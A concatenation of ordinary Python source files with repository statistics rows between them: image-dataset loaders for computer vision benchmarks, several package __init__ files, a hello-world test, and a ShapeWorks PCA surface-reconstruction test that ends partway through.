img_name = self.list_names[index]
assert os.path.exists(img_name), 'file {} not exits'.format(img_name)
image = Image.open(img_name).convert('RGB')
# print(image.size)
# print(self.bboxes[index])
# print(self.labels)
# print(self.list_names)
# pdb.set_trace()
# crop image using gt bbox <x> <y> <width> <height>
# (It will not change orginal image)
left, top, width, height = self.bboxes[index]
right = left + width
bottom = top + height
image = image.crop((left, top, right, bottom))
# image = image.crop((int(left), int(top), int(right), int(bottom)))
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.long)
if self.return_path:
return image, gt_label, img_name.split('/')[-1].split('.')[0]
else:
return image, gt_label
def read_labeled_image_crop_list(self, data_dir, data_list):
"""
Reads txt file containing paths to images, ground truth labels and bounding boxes.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and labels, respectively.
And an array of bounding boxes.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
img_bboxes = []
for line in f:
line = line.strip().split()
image = line[0]
labels = int(line[1])
bbox = json.loads('[%s]' % (','.join(line[2:])))
# pdb.set_trace()
img_name_list.append(os.path.join(data_dir, image))
img_labels.append(np.asarray(labels))
img_bboxes.append(bbox)
return img_name_list, img_labels, img_bboxes
# return img_name_list, img_labels, np.array(img_bboxes)
# ILSVRC
class ILSVRC(Dataset):
def __init__(self, root, mode='train', return_path=False, N=None,
transform=None, onehot_label=False, num_classes=ilsvrc_classes): #'train', 'test', 'val', num_tgt_cls=ilsvrc_classes
# self.num_tgt_cls = num_tgt_cls
self.mode = mode
self.path_dataset = root # PATH_ILSVRC
self.path_images = os.path.join(self.path_dataset, 'images', self.mode) # rearrange folder
self.return_path = return_path
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
# get list images
with open(os.path.join(self.path_dataset, 'lists/%s_list.txt'%self.mode), 'r') as f:
tmp = f.readlines()
list_names = [l.split(' ')[0] for l in tmp] # .JPEG
list_names = np.array([n.split('.')[0] for n in list_names])
self.list_names = list_names
labels = [int(l.split(' ')[1]) for l in tmp]
labels = np.array(labels)
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
# if mode=='train':
# random.shuffle(self.list_names)
# embed()
print("Init ILSVRC dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
# img_name = self.list_names[index]
img_name = os.path.join(self.path_images, self.list_names[index]+'.JPEG')
assert os.path.exists(img_name), 'file {} not exits'.format(img_name)
image = Image.open(img_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.long)
if self.return_path:
return image, gt_label, self.list_names[index]
else:
return image, gt_label
# # Image and saliency map paths
# rgb_ima = os.path.join(self.path_images, self.list_names[index]+'.JPEG')
# image = scipy.misc.imread(rgb_ima, mode='RGB')
#
#
# image = cv2.resize(image, (self.img_w, self.img_h), interpolation=cv2.INTER_AREA).astype(np.float32)
# img_processed = self.transform(image / 255.)
#
# label = self.labels[index]
#
# if self.return_path:
# return img_processed, label, self.list_names[index]
# else:
# return img_processed, label
# ==== collate_fn for handling grayscale images in batch of RGB images ====
def collate_fn_caltech(batch): # This does not work when normalization transform contains 3-dim mean and std.
images = list()
labels = list()
# pdb.set_trace()
for i, X in enumerate(batch):
print('X[0]', X[0].size(0))
# if X[0].size(0) < 3:
# tmp_img = X[0].repeat(3, 1, 1)
# print('tmp_img', tmp_img.size())
# images.append(tmp_img.unsqueeze(0))
if X[0].size(0) == 3:
images.append(X[0].unsqueeze(0))
else:
images.append(X[0].unsqueeze(0).repeat(1, 3, 1, 1))
labels.append(X[1])
# labels.append(X[1].unsqueeze(0))
images_batch = torch.cat(images, dim=0)
# images_batch = torch.cat(labels, dim=0)
labels_batch = torch.tensor(labels)
return images_batch, labels_batch
# ==== weakly object segmentation ====
# Object Discovery; generate list from folder
class ObjectDiscovery(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_EVENT
# self.path_images = self.path_dataset
self.path_images = os.path.join(self.path_dataset, 'Data')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'image_list.txt')
list_names, labels = self.read_labeled_image_list(self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
self.list_names = list_names
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init ObjectDiscovery dataset ...")
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = os.path.join(self.path_images, self.list_names[index])
assert os.path.exists(img_name), 'file {} not exits'.format(img_name)
image = Image.open(img_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.long)
if self.return_path:
# return image, gt_label, img_name.split('/')[-1].split('.')[0]
return image, gt_label, self.list_names[index]
else:
return image, gt_label
def read_labeled_image_list(self, data_list):
"""
Reads txt file containing paths to images and ground truth masks.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and masks, respectively.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
for line in f:
if ';' in line:
image, labels = line.strip("\n").split(';')
else:
if len(line.strip().split()) == 2:
image, labels = line.strip().split()
if '.' not in image:
image += '.jpg'
labels = int(labels)
else:
line = line.strip().split()
image = line[0]
labels = map(int, line[1:])
# img_name_list.append(os.path.join(data_dir, image))
img_name_list.append(image)
img_labels.append(np.asarray(labels))
return img_name_list, img_labels
# ==== other datasets used in cross-dataset classification ====
# STL_train (pytorch) shuffle=False, index follow the order; generate list from dataloader
# STL_test (pytorch) shuffle=False, index follow the order; generate list from dataloader
# caltech-101 (pytorch) shuffle=False, index follow the order; generate list from dataloader
# caltech-256 (pytorch) shuffle=False, index follow the order; generate list from dataloader
# Event-8; generate list from folder
class Event8(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_EVENT
self.path_images = self.path_dataset
# self.path_images = os.path.join(self.path_dataset, 'images')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'image_list.txt')
list_names, labels = self.read_labeled_image_list(self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
self.list_names = list_names
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init Event-8 dataset ...")
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = os.path.join(self.path_images, self.list_names[index])
assert os.path.exists(img_name), 'file {} not exits'.format(img_name)
image = Image.open(img_name).convert('RGB') # try not use PIL Image, not use ToTensor before ZCA tomorrow
# image = scipy.misc.imread(img_name, mode='RGB')
# image = cv2.resize(image, tuple(CIFAR_RESIZE), interpolation=cv2.INTER_LINEAR)
# # # image = image.astype('float32')
# # # image = cv2.resize(image, (input_h, input_w), interpolation=cv2.INTER_LINEAR)
# image = torch.tensor(image, dtype=torch.float32)
# zca = ZCAWhitening().fit(image)
# image = zca(image)
# image = image.numpy()
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.long)
if self.return_path:
# return image, gt_label, img_name.split('/')[-1].split('.')[0]
return image, gt_label, self.list_names[index]
else:
return image, gt_label
def read_labeled_image_list(self, data_list):
"""
Reads txt file containing paths to images and ground truth masks.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and masks, respectively.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
for line in f:
if ';' in line:
image, labels = line.strip("\n").split(';')
else:
if len(line.strip().split()) == 2:
image, labels = line.strip().split()
if '.' not in image:
image += '.jpg'
labels = int(labels)
else:
line = line.strip().split()
image = line[0]
labels = map(int, line[1:])
# img_name_list.append(os.path.join(data_dir, image))
img_name_list.append(image)
img_labels.append(np.asarray(labels))
return img_name_list, img_labels
# Action-40; generate list from folder
class Action40(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_EVENT
# self.path_images = self.path_dataset
self.path_images = os.path.join(self.path_dataset, 'JPEGImages')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'image_list.txt')
list_names, labels = self.read_labeled_image_list(self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
self.list_names = list_names
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init Action-40 dataset ...")
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = os.path.join(self.path_images, self.list_names[index])
assert os.path.exists(img_name), 'file {} not exits'.format(img_name)
image = Image.open(img_name).convert('RGB')
# image = scipy.misc.imread(img_name, mode='RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.long)
if self.return_path:
# return image, gt_label, img_name.split('/')[-1].split('.')[0]
return image, gt_label, self.list_names[index]
else:
return image, gt_label
def read_labeled_image_list(self, data_list):
"""
Reads txt file containing paths to images and ground truth masks.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and masks, respectively.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
for line in f:
if ';' in line:
image, labels = line.strip("\n").split(';')
else:
if len(line.strip().split()) == 2:
image, labels = line.strip().split()
if '.' not in image:
image += '.jpg'
labels = int(labels)
else:
line = line.strip().split()
image = line[0]
labels = map(int, line[1:])
# img_name_list.append(os.path.join(data_dir, image))
img_name_list.append(image)
img_labels.append(np.asarray(labels))
return img_name_list, img_labels
# Scene-67; generate list from folder
class Scene67(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_EVENT
# self.path_images = self.path_dataset
self.path_images = os.path.join(self.path_dataset, 'Images')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'image_list.txt')
list_names, labels = self.read_labeled_image_list(self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
self.list_names = list_names
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init Scene-67 dataset ...")
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = os.path.join(self.path_images, self.list_names[index])
assert os.path.exists(img_name), 'file {} not exits'.format(img_name)
image = Image.open(img_name).convert('RGB')
# image = scipy.misc.imread(img_name, mode='RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.long)
if self.return_path:
# return image, gt_label, img_name.split('/')[-1].split('.')[0]
return image, gt_label, self.list_names[index]
else:
return image, gt_label
def read_labeled_image_list(self, data_list):
"""
Reads txt file containing paths to images and ground truth masks.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and masks, respectively.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
for line in f:
if ';' in line:
image, labels = line.strip("\n").split(';')
else:
if len(line.strip().split(' ')) == 2:
image, labels = line.strip().split()
if '.' not in image:
image += '.jpg'
labels = int(labels)
else: # if image name contains space
line = line.strip().split(' ')
image = ' '.join(line[:-1])
# labels = map(int, line[1:])
labels = int(line[-1])
# img_name_list.append(os.path.join(data_dir, image))
img_name_list.append(image)
img_labels.append(np.asarray(labels))
return img_name_list, img_labels
# Tiny Imagenet
class TinyImagenet(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, mode='train', return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_CUB?
self.mode = mode
self.path_images = os.path.join(self.path_dataset, self.mode)
self.return_path = return_path
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
label_indices = range(self.num_classes)
# this might be faster than reading folders from disk?
wnids_txt = os.path.join(self.path_dataset, 'wnids.txt')
with open(wnids_txt) as f:
# label_wnids = f.readlines()
label_wnids = f.read().splitlines()
self.label_dict = dict(zip(label_wnids, label_indices))
if self.mode == 'train':
list_names = []
labels = []
for label in label_wnids:
bbox_txt = os.path.join(self.path_images, label, label+'_boxes.txt')
# pdb.set_trace()
with open(bbox_txt) as f:
# lines = f.readlines()
# names = [os.path.join(self.path_images, label, 'images', l.split(' ')[0]) for l in lines]
lines = f.read().splitlines()
names = [os.path.join(self.path_images, label, 'images', l.split('\t')[0]) for l in lines]
list_names.extend(names)
labels.extend([self.label_dict[label]]*len(names))
elif self.mode == 'val':
anno_txt = os.path.join(self.path_images, 'val_annotations.txt')
# pdb.set_trace()
with open(anno_txt) as f:
# lines = f.readlines()
# names = [os.path.join(self.path_images, 'images', l.split(' ')[0]) for l in lines]
# lbs = [self.label_dict[l.split(' ')[1]] for l in lines]
lines = f.read().splitlines()
list_names = [os.path.join(self.path_images, 'images', l.split('\t')[0]) for l in lines]
labels = [self.label_dict[l.split('\t')[1]] for l in lines]
assert max(labels) == (self.num_classes-1)
list_names = np.array(list_names)
self.list_names = list_names
labels = np.array(labels)
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init Tiny ImageNet dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = self.list_names[index]
assert os.path.exists(img_name), 'file {} not exits'.format(img_name)
image = Image.open(img_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.long)
if self.return_path:
return image, gt_label, img_name.split('/')[-1].split('.')[0]
else:
return image, gt_label
if __name__ == "__main__":
# transformation for training set
tencrop = True
print(tencrop == True)
mean_vals = [0.485, 0.456, 0.406]
std_vals = [0.229, 0.224, 0.225]
# input_size = (256, 256)
# crop_size = (224, 224) # ILSVRC, CUB
input_size = (80, 80)
crop_size = (80, 80) # CUB_crop
tsfm_train = transforms.Compose([transforms.Resize(input_size), # 256
transforms.RandomCrop(crop_size), # 224
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean_vals, std_vals)])
if tencrop:
func_transforms = [transforms.Resize(input_size),
transforms.TenCrop(crop_size),
transforms.Lambda(
lambda crops: torch.stack(
[transforms.Normalize(mean_vals, std_vals)(transforms.ToTensor()(crop)) for crop in
crops])),
]
else:
func_transforms = [transforms.Resize(input_size),
# transforms.Resize(crop_size),
transforms.CenterCrop(crop_size),
transforms.ToTensor(),
transforms.Normalize(mean_vals, std_vals), ]
tsfm_clstest = transforms.Compose(func_transforms)
# transformation for test loc set
tsfm_loctest = transforms.Compose([transforms.Resize(crop_size), # 224
transforms.ToTensor(),
transforms.Normalize(mean_vals, std_vals)])
# test ILSVRC datasets
# # ds_train = ILSVRC(root=PATH_ILSVRC, N=4, return_path=True, mode='train', transform=tsfm_train) # OK image, label, (, image_name)
# ds_train = ILSVRC(root=PATH_ILSVRC, N=4, return_path=True, mode='val', transform=tsfm_clstest) # OK image, label, (, image_name)
# test CUB datasets
# ds_train = CUB(root=PATH_CUB, N=4, return_path=True, mode='train', transform=tsfm_train) # OK image, label, (, image_name)
# ds_train = CUB(root=PATH_CUB, N=4, return_path=True, mode='test', transform=tsfm_clstest) # OK image, label, (, image_name)
# test CUB_crop datasets
# ds_train = CUB_crop(root=PATH_CUB, N=4, return_path=True, mode='train', transform=tsfm_train) # OK image, label, (, image_name)
# ds_train = CUB_crop(root=PATH_CUB, N=4, return_path=True, mode='test', transform=tsfm_clstest) # OK image, label, (, image_name)
# test Caltech datasets
# caltech_transforms = transforms.Compose([transforms.Resize(crop_size), # 224
# transforms.ToTensor(),])
#
# # ds_train = datasets.Caltech101(PATH_CALTECH101, download=False, transform=caltech_transforms)
# # train_dataloader = DataLoader(ds_train, batch_size=2, shuffle=True, num_workers=2, collate_fn=collate_fn_caltech)
# ds_train = Caltech101(PATH_CALTECH101, download=False, transform=tsfm_train)
# test Event-8 dataset
# ds_train = Event8(root=PATH_EVENT, N=4, return_path=True, transform=tsfm_train) # OK image, label, (, image_name)
# test Action-40 dataset
# ds_train = Action40(root=PATH_ACTION, N=4, return_path=True, transform=tsfm_train) # OK image, label, (, image_name)
# test Scene-67 dataset
# ds_train = Scene67(root=PATH_SCENE, N=4, return_path=True, transform=tsfm_train) # OK image, label, (, image_name)
# test ObjectDiscovery dataset
# ds_train = ObjectDiscovery(root=PATH_OD, N=4, return_path=True, transform=tsfm_train) # OK image, label, (, image_name)
# test TinyImagenet dataset
ds_train = TinyImagenet(root=PATH_TINYIM, N=4, return_path=True, mode='train', transform=tsfm_train) # OK image, label, (, image_name)
# ds_train = TinyImagenet(root=PATH_TINYIM, N=4, return_path=True, mode='val', transform=tsfm_train) # OK image, label, (, image_name)
train_dataloader = DataLoader(ds_train, batch_size=2, shuffle=True, num_workers=2)
for i, X in enumerate(train_dataloader):
print(i)
print('images', X[0].size())
print('labels', X[1].size())
print('image_names', X[-1])
# if i>10:
# break
| 37.972946 | 139 | 0.589968 | 4,808 | 37,897 | 4.461522 | 0.072587 | 0.046152 | 0.036362 | 0.020885 | 0.795907 | 0.77409 | 0.743508 | 0.731994 | 0.714186 | 0.704676 | 0 | 0.016168 | 0.294957 | 37,897 | 997 | 140 | 38.011033 | 0.786669 | 0.278703 | 0 | 0.71529 | 0 | 0 | 0.039628 | 0.000835 | 0 | 0 | 0 | 0 | 0.015817 | 1 | 0.063269 | false | 0 | 0.043937 | 0.017575 | 0.186292 | 0.042179 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee40a9cb9892aba0277b79f10355acefe321445f | 182 | py | Python | promoterz/__init__.py | emillj/gekkoJaponicus | d77c8c7a303b97a3643eb3f3c8b995b8b393f3f7 | [
"MIT"
] | null | null | null | promoterz/__init__.py | emillj/gekkoJaponicus | d77c8c7a303b97a3643eb3f3c8b995b8b393f3f7 | [
"MIT"
] | null | null | null | promoterz/__init__.py | emillj/gekkoJaponicus | d77c8c7a303b97a3643eb3f3c8b995b8b393f3f7 | [
"MIT"
] | 1 | 2021-11-29T20:18:25.000Z | 2021-11-29T20:18:25.000Z | #!/bin/python
from . import functions
from . import supplement, validation, utils
from . import evaluation, evolutionHooks
from . import world, locale
from . import evaluationPool
| 20.222222 | 43 | 0.78022 | 21 | 182 | 6.761905 | 0.619048 | 0.352113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148352 | 182 | 8 | 44 | 22.75 | 0.916129 | 0.065934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ee50c016f793a7cbf0fe6be12a34d44efcb136c7 | 329 | py | Python | src/wai/annotations/core/help/__init__.py | waikato-ufdl/wai-annotations-core | bac3429e9488efb456972c74f9d462f951c4af3d | [
"Apache-2.0"
] | null | null | null | src/wai/annotations/core/help/__init__.py | waikato-ufdl/wai-annotations-core | bac3429e9488efb456972c74f9d462f951c4af3d | [
"Apache-2.0"
] | 3 | 2021-06-30T23:42:47.000Z | 2022-03-01T03:45:07.000Z | src/wai/annotations/core/help/__init__.py | waikato-ufdl/wai-annotations-core | bac3429e9488efb456972c74f9d462f951c4af3d | [
"Apache-2.0"
] | null | null | null | """
Utilities for providing generated help messages.
"""
from ._format_stage_usage import format_stage_usage
from ._MainUsageFormatter import MainUsageFormatter
from ._plugin_usage_formatter_with_default_start_indent import plugin_usage_formatter_with_default_start_indent
from ._PluginUsageFormatter import PluginUsageFormatter
| 41.125 | 111 | 0.893617 | 38 | 329 | 7.210526 | 0.5 | 0.080292 | 0.116788 | 0.175182 | 0.306569 | 0.306569 | 0.306569 | 0 | 0 | 0 | 0 | 0 | 0.072948 | 329 | 7 | 112 | 47 | 0.898361 | 0.145897 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ee5d0f93ea85884d0121d19cfd60fc03dec59bd6 | 501 | py | Python | sdk/lusid_notifications/api/__init__.py | finbourne/notifications-sdk-python-preview | 2368e05445c74dc248afc1c98efa9f2ca895de3b | [
"MIT"
] | null | null | null | sdk/lusid_notifications/api/__init__.py | finbourne/notifications-sdk-python-preview | 2368e05445c74dc248afc1c98efa9f2ca895de3b | [
"MIT"
] | null | null | null | sdk/lusid_notifications/api/__init__.py | finbourne/notifications-sdk-python-preview | 2368e05445c74dc248afc1c98efa9f2ca895de3b | [
"MIT"
] | null | null | null | from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from lusid_notifications.api.application_metadata_api import ApplicationMetadataApi
from lusid_notifications.api.deliveries_api import DeliveriesApi
from lusid_notifications.api.event_types_api import EventTypesApi
from lusid_notifications.api.events_api import EventsApi
from lusid_notifications.api.notifications_api import NotificationsApi
from lusid_notifications.api.subscriptions_api import SubscriptionsApi
| 41.75 | 83 | 0.892216 | 62 | 501 | 6.903226 | 0.403226 | 0.261682 | 0.308411 | 0.350467 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002165 | 0.077844 | 501 | 11 | 84 | 45.545455 | 0.924242 | 0.081836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c9b1037f289904178f7fcc02d4d811923dd564c1 | 213 | py | Python | test/solution_tests/HLO/test_hlo.py | DPNT-Sourcecode/CHK-itim01 | 4627f0a8c79da662fe1bfb5387622558e5d0d6ef | [
"Apache-2.0"
] | null | null | null | test/solution_tests/HLO/test_hlo.py | DPNT-Sourcecode/CHK-itim01 | 4627f0a8c79da662fe1bfb5387622558e5d0d6ef | [
"Apache-2.0"
] | null | null | null | test/solution_tests/HLO/test_hlo.py | DPNT-Sourcecode/CHK-itim01 | 4627f0a8c79da662fe1bfb5387622558e5d0d6ef | [
"Apache-2.0"
] | null | null | null | from solutions.HLO import hello_solution
class TestHlo():
def test_hlo(self):
assert hello_solution.hello("World") == "Hello, World!"
assert hello_solution.hello("Friend") == "Hello, Friend!"
| 30.428571 | 65 | 0.680751 | 26 | 213 | 5.423077 | 0.538462 | 0.276596 | 0.269504 | 0.340426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183099 | 213 | 6 | 66 | 35.5 | 0.810345 | 0 | 0 | 0 | 0 | 0 | 0.178404 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
4ea8424255ff4a6c7ebde4ea36ecea646cbf8592 | 3,511 | py | Python | Testing/PythonTests/reconstructpca.py | SCIInstitute/shapeworks | cbd44fdeb83270179c2331f2ba8431cf7330a4ff | [
"MIT"
] | 3 | 2016-04-26T15:29:58.000Z | 2018-10-05T18:39:12.000Z | Testing/PythonTests/reconstructpca.py | SCIInstitute/shapeworks | cbd44fdeb83270179c2331f2ba8431cf7330a4ff | [
"MIT"
] | 35 | 2015-05-22T18:26:16.000Z | 2019-06-03T18:09:40.000Z | Testing/PythonTests/reconstructpca.py | SCIInstitute/shapeworks | cbd44fdeb83270179c2331f2ba8431cf7330a4ff | [
"MIT"
] | 7 | 2015-06-18T18:56:12.000Z | 2019-06-17T19:15:06.000Z | import os
import sys
from shapeworks import *
success = True
def pcamodesTestRBFS():
print("\npython pcamodesTestRBFS")
denseFile = os.environ["DATA"] + "/_dense.vtk"
sparseFile = os.environ["DATA"] + "/_sparse.particles"
goodPointsFile = os.environ["DATA"] + "/_goodPoints.txt"
worldParticles = []
worldParticles.append(os.environ["DATA"] + "/ellipsoid_00.world.particles")
worldParticles.append(os.environ["DATA"] + "/ellipsoid_01.world.particles")
worldParticles.append(os.environ["DATA"] + "/ellipsoid_02.world.particles")
reconstructor = ReconstructSurface_RBFSSparseTransform(denseFile, sparseFile, goodPointsFile)
reconstructor.setOutPrefix("rbfs")
reconstructor.setOutPath(".")
reconstructor.setNumOfParticles(128)
reconstructor.setNumOfModes(1)
reconstructor.setNumOfSamplesPerMode(3)
reconstructor.samplesAlongPCAModes(worldParticles)
baselineDenseMesh1 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/rbfs_mode-00_sample-000_dense.vtk")
baselineDenseMesh2 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/rbfs_mode-00_sample-001_dense.vtk")
baselineDenseMesh3 = Mesh(os.environ["DATA"] + "/reconstruct_pca_python/rbfs_mode-00_sample-002_dense.vtk")
denseMesh1 = Mesh("mode-00/rbfs_mode-00_sample-000_dense.vtk")
denseMesh2 = Mesh("mode-00/rbfs_mode-00_sample-001_dense.vtk")
denseMesh3 = Mesh("mode-00/rbfs_mode-00_sample-002_dense.vtk")
print("comparing dense mesh 1...")
success = baselineDenseMesh1 == denseMesh1
print("comparing dense mesh 2...")
success = success and baselineDenseMesh2 == denseMesh2
print("comparing dense mesh 3...")
success = success and baselineDenseMesh3 == denseMesh3
return success
success &= utils.test(pcamodesTestRBFS)
def pcamodesTestThinPlateSpline():
print("\npython pcamodesTestThinPlateSpline")
denseFile = os.environ["DATA"] + "/_dense.vtk"
sparseFile = os.environ["DATA"] + "/_sparse.particles"
goodPointsFile = os.environ["DATA"] + "/_goodPoints.txt"
worldParticles = []
worldParticles.append(os.environ["DATA"] + "/ellipsoid_00.world.particles")
worldParticles.append(os.environ["DATA"] + "/ellipsoid_01.world.particles")
worldParticles.append(os.environ["DATA"] + "/ellipsoid_02.world.particles")
reconstructor = ReconstructSurface_ThinPlateSplineTransform(denseFile, sparseFile, goodPointsFile)
reconstructor.setOutPrefix("tps")
reconstructor.setOutPath(".")
reconstructor.setNumOfParticles(128)
reconstructor.setNumOfModes(1)
reconstructor.setNumOfSamplesPerMode(3)
reconstructor.setMaxStdDev(5)
